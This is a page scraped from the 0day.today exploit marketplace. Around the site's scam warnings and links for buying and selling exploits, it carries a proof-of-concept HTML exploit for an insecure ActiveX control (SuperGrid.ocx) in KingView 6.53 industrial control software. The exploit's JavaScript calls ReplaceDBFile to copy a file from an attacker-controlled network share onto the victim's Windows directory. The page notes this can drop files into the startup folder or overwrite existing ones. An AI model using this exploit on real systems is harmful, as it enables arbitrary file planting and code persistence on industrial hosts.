0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
KingView 6.53 - Insecure ActiveX Control (SuperGrid)
<html> <object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object> <!-- KingView Insecure ActiveX Control - SuperGrid Vendor: http://www.wellintech.com Version: KingView 6.53 Tested on: Windows XP SP3 / IE Download: http://www.wellintech.com/documents/KingView6.53_EN.zip Author: Blake CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E ProgId: SUPERGRIDLib.SuperGrid Path: C:\Program Files\KingView\SuperGrid.ocx MemberName: ReplaceDBFile Safe for scripting: False Safe for init: False Kill Bit: False IObject safety not implemented --> <title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title> <p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p> <input type=button onclick="copyfile()" value="Do It!"> <script> function copyfile() { var file1 = "\\\\192.168.1.165\\share\\poc.txt"; //source var file2 = "c:\\WINDOWS\\poc.txt"; //destination result = target.ReplaceDBFile(file1,file2); } </script> # 0day.today [2024-09-28] #